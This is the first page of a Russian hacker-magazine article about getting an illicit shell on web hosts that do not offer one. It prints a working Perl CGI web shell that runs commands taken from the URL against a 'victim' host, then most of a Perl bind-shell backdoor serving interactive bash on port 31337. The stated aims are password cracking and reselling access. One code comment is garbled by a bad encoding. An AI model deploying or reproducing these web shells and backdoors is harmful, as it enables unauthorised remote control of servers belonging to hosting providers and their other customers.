Shell на халяву

Xakep, номер #047, стр. 047-064-1

Создаем шелл на кривых хостингах

Докучаев Дмитрий aka Forb (forb@ruhost.ru)

Как известно, все хостинги делятся на два типа - с предоставлением шелл-аккаунта или без него (третьего не дано). В этой статье мы будем разбираться со вторым вариантом, точнее - рассмотрим пути получения шелла на этом хостинге.

Вообще, хостинги - вещь интересная. Шелл может оказаться весьма полезной фичей. Почему? Во-первых, канал. На уважающем себя хостинге канал должен быть широкий. Во-вторых, сам софт. Пень 166 для хостинга не пройдет =). Следовательно, можно запускать задачи наподобие john, требующие мощного проца. И, наконец, на некоторых хостингах имеются реверсивные виртуалхосты (которые резолвятся в обе стороны) - можно запросто поставить баунсер с отличными хостами, да еще и затрейдить доступ к нему.

Shell через CGI

Слюнки потекли? Ладно, не буду терроризировать. Приступим к делу, то бишь к получению заветного shell-аккаунта. Если есть доступ к ftp и право на выполнение cgi/php скриптов, то шанс получить шелл, а в перспективе и rootshell, резко возрастает. Итак, первый способ получения некоего www-shell'a: заливаем на ftp хостинга скрипт cmd.cgi с простым как мир содержимым:

#!/usr/bin/perl

print "Content-type: text/html\n\n"; Выводим хедер

$cmd=$ENV{QUERY_STRING}; ## Команда для выполнения - атрибут скрипта

$cmd=~s/%20/ /g; ## Заменим все unicode пробела на реальный пробел

print "

".`$cmd`."<\/pre>"; ## Âûïèøåì ðåçóëüòàò êîìàíäû â 

Корректно заливаем скрипт (в ASCII-режиме), ставим атрибут 755 и обращаемся: http://www.victim.com/~xakep/cmd.cgi?id (впоследствии я буду называть www.victim.com). Результатом будет, как правило, строчка следующего вида в браузере:

uid=nobody(31337) gid=nobody(31337)

Удаленный бэкдор

Но, конечно, бродить по дирам, взламывать сервер etc не интерактивным путем - сложно и неудобно, поэтому лучше воспользоваться скриптами, которые способны открыть порт на сервере (некий backdoor) с интерактивным шеллом. Используя Perl для этой корыстной цели, пишем обычный бэкдор (код старый, но до сих пор актуальный):

#!/usr/bin/perl

$SHELL="/bin/bash -i"; ## Будем использовать интерактивный bash в качестве шелла

$LISTEN_PORT="31337"; ## Выбираем порт 31337 для бэкдора

use Socket; ## Используем модуль Socket

$protocol=getprotobyname('tcp'); ### Протокол - TCP

socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n"; ### Пытаемся создать сокет-дескриптор либо завершаем скрипт с сообщением об ошибке.

setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); ## Заставляем сокет поддерживать REUSE - возможность многоразового использования порта

bind (S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n"; ## Биндим порт на все адреса машины либо сообщаем об ошибке

listen (S,3) || die "Cant listen port\n"; ## Ждем коннектов на порт

while(1)

{

accept (CONN,S); ## При подключении создаем дескриптор с именем CONN

if(! ($pid=fork)) ## Делаем процесс потомок для коннекта с дескриптором CONN

{

die "Cannot fork" if (! defined $pid); ## В случае неудачи ответвления - завершаем работу

Содержание  Вперед на стр. 047-064-2